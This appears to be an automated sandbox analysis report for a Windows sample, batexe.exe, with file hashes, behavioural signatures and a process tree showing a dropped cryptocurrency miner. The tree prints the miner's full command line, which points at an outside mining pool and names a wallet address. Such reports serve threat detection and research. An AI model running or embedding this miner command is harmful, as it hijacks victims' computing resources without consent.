73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
304s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
13/02/2024, 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1636	b2e.exe
2532	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe
2532	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1240-4-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1240 wrote to memory of 1636	1240	batexe.exe	73
PID 1240 wrote to memory of 1636	1240	batexe.exe	73
PID 1240 wrote to memory of 1636	1240	batexe.exe	73
PID 1636 wrote to memory of 1332	1636	b2e.exe	74
PID 1636 wrote to memory of 1332	1636	b2e.exe	74
PID 1636 wrote to memory of 1332	1636	b2e.exe	74
PID 1332 wrote to memory of 2532	1332	cmd.exe	77
PID 1332 wrote to memory of 2532	1332	cmd.exe	77

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Users\Admin\AppData\Local\Temp\CEE9.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\CEE9.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\CEE9.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D3F9.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CEE9.tmp\b2e.exe

Filesize
3.3MB

MD5
3382e552a02c986b1f02494030f6f48b

SHA1
fd57c8f63b5c38e1278986b650e8f3a0e177fd8f

SHA256
5d633a65517a3bd2164bdfb4e424b20773c40d2692d05668a80f43a7f2dda73e

SHA512
b2a613f45e13f0021253ec7af7156d8dbeef05abb82b21eb1e46746a854d889864678335b0756624c5345f6382ee19aef79666295ac627a43b652776c0910cd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\CEE9.tmp\b2e.exe

Filesize
3.0MB

MD5
68c6401bd5782ae389c0d62ce62b23f9

SHA1
4555af09246f334c403883dc4cbcda33b33de4ce

SHA256
ff65fd21eb64a944f7c90eefb39616080a2a5a1d4e71c3f19e1e083ed38eede5

SHA512
64179558c37ed33ba7d4ebe2cb10d35dba12a7d7876bd15a191028721944e64fadf963a704db66f8e5b91b6f61bd4ffa61190b2eaedee32052da3a4e23b45bce

Download Submit
C:\Users\Admin\AppData\Local\Temp\D3F9.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
646KB

MD5
fec7abf697740ff43a604a689a8fe6d2

SHA1
2b7b8a734656f6e1e2ade7137048c797b5ef2915

SHA256
0baf099ebd530218b3ba1dd82f9771f9f5b51544bf7839f1da013aa38a4a9314

SHA512
68790adbae62006095022b9dfba33ce99f108d147ae0f8aa6f8bca7274d963eb1e2b0a689a217cc18874b2db3c78a7d25a8d43d964e234c63b21f884820b03b6

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
673KB

MD5
9079ac57ba188463b25272b05ae2c14a

SHA1
c9daedb94c17632dd1fc626af6f7c05b8d944ce5

SHA256
83cada27875121e900085e926314e9fbafcee9b8eab8a5ecfd201b9890773fc6

SHA512
62aefdbe588bd32ab9695dbbb7a7df1dbca77c39c38bd8fc6c7fccebe2d6f031a32c0459b80a72224eedc63a28a07d3c2cd271cdf6ecef0fc35f6c493319b162

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
505KB

MD5
00dcff44ad80efb383f611351a308052

SHA1
fca7972562e02456742dc4fd5cc8e25a28af2f23

SHA256
adb1dfdadf48a90279cd0f84b1ee298c95ba146f989a8d8584843afc7b56f224

SHA512
d2ca3d8b209ee01787ae1436732feed446941b5d9e8359c07ca7b505bd33060a6160cfd27838d32f6056e05cfd74a55a9b1a3e74a51a0d0ad671d952d2b36cbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
889KB

MD5
d29a228c9edd5cc906c005ec2a6ddd9a

SHA1
6f471bed53b6d13c82858d9afaea702bd1e82e80

SHA256
43b21c4f1cdc3bcdb2112fd257f4295ffd20415bc117dd4e41a17debed550a9f

SHA512
8dea0c5b5c05b01608259ba1fda9a3122b202f06cd48639b23059d79e15813d27a4088a1ca13e8dd71423a0f022334cfb8c7446a40ad256a96f8571708e44287

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
574KB

MD5
45fc1733deadfc4dff4c393c1a417408

SHA1
93bfbb5c7d70c754655f770da9542464dabbbc26

SHA256
5434cf97eb48622bc21abd421b0eef8cb7c93b1aa7372795c7c33331754cf87d

SHA512
9e57929d4b00e18142942cd81579e6fa80e7d0508689a88d9101d6f3fa9299510ea0dc99c16c1b7a9a44f79634c7970cb1c160c5b9bfa94d7e5a4ab13da2e866

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
823KB

MD5
10a402f19d7599529aeabc05490ac74a

SHA1
471efe77d2dbb376dacbb8c6908efb27667fef25

SHA256
94d4bcd5a0e291075b238320e0d1eeb9cd9e4d18fde23326d32f874d12e1fdb7

SHA512
b51c01d4467de77cf98afd6f12dc5d4ab0322eaa943321ecbe9db546e79459eb8ffe4e6a8f8c38ef7d520bd505e22676a45f743deed450ca081d5d7b0312b6ea

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
507KB

MD5
eae7c88288eeba238461c24dd7a57152

SHA1
941de6f3a27511c4faa6cce153622e26bf5f7622

SHA256
267fc8b063a396b036a333289ee1acfa071b46d65e3935fbdcb0e87719b0e492

SHA512
87bcc046afa9b72c097126646ad016408e5063c1ebe8b321fc7d73bc94a7871c2b6d14082ee5fda9799d3ebd35af1ffe14087eb6680ac66cad8689c47192d7a4

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
534KB

MD5
235e2ec4736be6e01a9f1c39f314de7f

SHA1
d01d6ccd1ab0c6e60c3827a4e87171408dca0cd1

SHA256
1e4607d7d59975730a95863d360da278280d1c328cb34ae424cf804c926565da

SHA512
9de898270de063d6a29a5c48b13e394f1dbde08630a67a1a10ef5ac4763e86b37e624d15da7c2695a849f57150428ffd35d381dd08d85b4756c1ff9ecb804ab9

Download Submit
memory/1240-4-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1636-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1636-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2532-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2532-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2532-43-0x0000000077A60000-0x0000000077AF8000-memory.dmp

Filesize
608KB

Download
memory/2532-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2532-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2532-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download